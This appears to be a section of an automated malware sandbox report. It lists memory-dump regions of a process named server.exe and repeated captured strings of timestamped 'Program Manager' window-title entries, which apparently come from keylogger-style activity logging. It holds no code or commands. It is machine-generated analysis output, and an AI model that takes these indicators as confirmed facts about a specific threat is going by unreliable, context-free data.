          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 20:59:29 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 06:03:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 12:18:11 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/26 | 19:24:54 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 19:14:15 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 03:38:42 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 11:28:20 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 12:22:13 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 20:45:29 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/27 | 08:20:23 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 03:48:20 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 03:26:57 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 15:27:30 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 04:08:46 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 11:14:37 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 10:20:54 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 04:12:18 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 10:28:36 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 05:30:31 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/17 | 19:11:49 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 18:27:49 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 11:28:17 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 12:48:32 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 08:41:28 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/19 | 23:49:18 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 23:27:41 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/28 | 00:21:39 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 20:22:43 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 00:27:14 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/27 | 17:51:55 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 12:43:37 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 17:56:25 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 09:08:36 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 21:03:18 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 04:11:04 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 20:51:29 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 12:21:32 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 05:51:28 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 19:52:59 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 04:11:11 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 12:11:55 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 02:33:55 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 19:34:12 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 13:33:39 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 23:55:46 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 19:00:52 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 05:28:03 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 03:43:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 09:10:44 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 09:00:11 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 13:51:27 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 14:05:28 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 16:14:21 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 23:52:36 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 20:24:42 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 19:51:00 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 08:16:53 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 11:28:10 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 01:49:49 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 14:32:51 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 13:13:28 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 13:30:40 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 08:28:56 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 04:53:58 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 08:20:22 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 03:03:46 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 23:48:54 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 08:42:30 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 08:34:02 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 04:32:59 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 22:19:53 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 18:45:03 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 08:40:01 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 11:42:06 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 15:27:58 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 15:07:33 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 13:56:23 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 23:12:00 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 15:14:54 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 15:22:04 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 12:30:36 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 14:48:05 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 04:20:53 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 02:44:44 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 14:39:17 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 07:09:25 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 11:40:48 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 05:32:26 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 10:46:24 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 02:42:46 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 07:10:27 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/27 | 16:16:04 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 07:17:28 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 02:44:24 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 25 | 08:00:21 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 10:30:33 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 12:24:19 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 16:21:34 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 17:55:15 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 14:31:51 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 12:34:12 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 11:46:33 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 16:07:00 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 13:16:59 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 18:41:50 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 13:16:39 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 14:08:59 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 19:33:58 - Program Manager
